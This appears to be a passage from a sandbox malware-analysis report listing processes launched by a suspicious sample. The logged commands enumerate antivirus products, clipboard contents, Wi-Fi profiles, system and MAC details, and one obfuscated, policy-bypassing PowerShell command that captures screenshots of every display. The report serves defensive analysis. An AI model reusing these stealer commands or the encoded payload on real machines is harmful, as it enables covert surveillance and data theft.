Imagebase:	0x7ff7be880000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	31
Start time:	16:12:08
Start date:	01/01/2025
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
Imagebase:	0x7ff6fc730000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Analysis Process: cmd.exePID: 1220, Parent PID: 7332

General

Target ID:	32
Start time:	16:12:08
Start date:	01/01/2025
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
Imagebase:	0x7ff6fc730000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Analysis Process: conhost.exePID: 5780, Parent PID: 1436

General

Target ID:	33
Start time:	16:12:08
Start date:	01/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	34
Start time:	16:12:08
Start date:	01/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	35
Start time:	16:12:08
Start date:	01/01/2025
Path:	C:\Windows\System32\tasklist.exe
Wow64 process (32bit):	false
Commandline:	tasklist /FO LIST
Imagebase:	0x7ff63d290000
File size:	106'496 bytes
MD5 hash:	D0A49A170E13D7F6AEBBEFED9DF88AAA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	36
Start time:	16:12:08
Start date:	01/01/2025
Path:	C:\Windows\System32\tasklist.exe
Wow64 process (32bit):	false
Commandline:	tasklist /FO LIST
Imagebase:	0x7ff63d290000
File size:	106'496 bytes
MD5 hash:	D0A49A170E13D7F6AEBBEFED9DF88AAA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	37
Start time:	16:12:09
Start date:	01/01/2025
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
Imagebase:	0x7ff6fc730000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	38
Start time:	16:12:09
Start date:	01/01/2025
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
Imagebase:	0x7ff6fc730000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	39
Start time:	16:12:09
Start date:	01/01/2025
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
Imagebase:	0x7ff6fc730000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Analysis Process: conhost.exePID: 7636, Parent PID: 1860

General

Target ID:	40
Start time:	16:12:09
Start date:	01/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	41
Start time:	16:12:09
Start date:	01/01/2025
Path:	C:\Windows\System32\wbem\WMIC.exe
Wow64 process (32bit):	false
Commandline:	WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
Imagebase:	0x7ff6ab520000
File size:	576'000 bytes
MD5 hash:	C37F2F4F4B3CD128BDABCAEB2266A785
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	42
Start time:	16:12:09
Start date:	01/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	43
Start time:	16:12:09
Start date:	01/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	44
Start time:	16:12:10
Start date:	01/01/2025
Path:	C:\Windows\System32\tasklist.exe
Wow64 process (32bit):	false
Commandline:	tasklist /FO LIST
Imagebase:	0x7ff63d290000
File size:	106'496 bytes
MD5 hash:	D0A49A170E13D7F6AEBBEFED9DF88AAA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	45
Start time:	16:12:10
Start date:	01/01/2025
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	powershell Get-Clipboard
Imagebase:	0x7ff7be880000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	46
Start time:	16:12:11
Start date:	01/01/2025
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "tree /A /F"
Imagebase:	0x7ff6fc730000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	47
Start time:	16:12:11
Start date:	01/01/2025
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "systeminfo"
Imagebase:	0x7ff6fc730000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	48
Start time:	16:12:11
Start date:	01/01/2025
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
Imagebase:	0x7ff6fc730000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	49
Start time:	16:12:11
Start date:	01/01/2025
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
Imagebase:	0x7ff6fc730000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	50
Start time:	16:12:11
Start date:	01/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	51
Start time:	16:12:11
Start date:	01/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	52
Start time:	16:12:11
Start date:	01/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	53
Start time:	16:12:11
Start date:	01/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	54
Start time:	16:12:11
Start date:	01/01/2025
Path:	C:\Windows\System32\tree.com
Wow64 process (32bit):	false
Commandline:	tree /A /F
Imagebase:	0x7ff6cb6b0000
File size:	20'992 bytes
MD5 hash:	9EB969EF56718A6243BF60350CD065F0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	55
Start time:	16:12:11
Start date:	01/01/2025
Path:	C:\Windows\System32\systeminfo.exe
Wow64 process (32bit):	false
Commandline:	systeminfo
Imagebase:	0x7ff6f9250000
File size:	110'080 bytes
MD5 hash:	EE309A9C61511E907D87B10EF226FDCD
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	56
Start time:	16:12:11
Start date:	01/01/2025
Path:	C:\Windows\System32\netsh.exe
Wow64 process (32bit):	false
Commandline:	netsh wlan show profile
Imagebase:	0x7ff7e6640000
File size:	96'768 bytes
MD5 hash:	6F1E6DD688818BC3D1391D0CC7D597EB
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	57
Start time:	16:12:11
Start date:	01/01/2025
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
Imagebase:	0x7ff7be880000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	58
Start time:	16:12:13
Start date:	01/01/2025
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "tree /A /F"
Imagebase:	0x7ff6fc730000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Analysis Process: conhost.exePID: 7852, Parent PID: 8028

General

Target ID:	59
Start time:	16:12:13
Start date:	01/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	60
Start time:	16:12:13
Start date:	01/01/2025
Path:	C:\Windows\System32\SIHClient.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\sihclient.exe /cv QZj+5JUF0k+XXwZK8rpr7Q.0.2
Imagebase:	0x7ff766750000
File size:	380'720 bytes
MD5 hash:	8BE47315BF30475EEECE8E39599E9273
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	61
Start time:	16:12:13
Start date:	01/01/2025
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "getmac"
Imagebase:	0x7ff6fc730000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	62
Start time:	16:12:13
Start date:	01/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	63
Start time:	16:12:13
Start date:	01/01/2025
Path:	C:\Windows\System32\tree.com
Wow64 process (32bit):	false
Commandline:	tree /A /F
Imagebase:	0x7ff6cb6b0000
File size:	20'992 bytes
MD5 hash:	9EB969EF56718A6243BF60350CD065F0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	64
Start time:	16:12:13
Start date:	01/01/2025
Path:	C:\Windows\System32\getmac.exe
Wow64 process (32bit):	false
Commandline:	getmac
Imagebase:	0x7ff730440000
File size:	90'112 bytes
MD5 hash:	7D4B72DFF5B8E98DD1351A401E402C33
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	65
Start time:	16:12:13
Start date:	01/01/2025
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "tree /A /F"
Imagebase:	0x7ff6fc730000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Analysis Process: conhost.exePID: 7832, Parent PID: 7596

General

Target ID:	66
Start time:	16:12:13
Start date:	01/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	67
Start time:	16:12:14
Start date:	01/01/2025
Path:	C:\Windows\System32\tree.com
Wow64 process (32bit):	false
Commandline:	tree /A /F
Imagebase:	0x7ff6cb6b0000
File size:	20'992 bytes
MD5 hash:	9EB969EF56718A6243BF60350CD065F0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	68
Start time:	16:12:14
Start date:	01/01/2025
Path:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
Wow64 process (32bit):	false
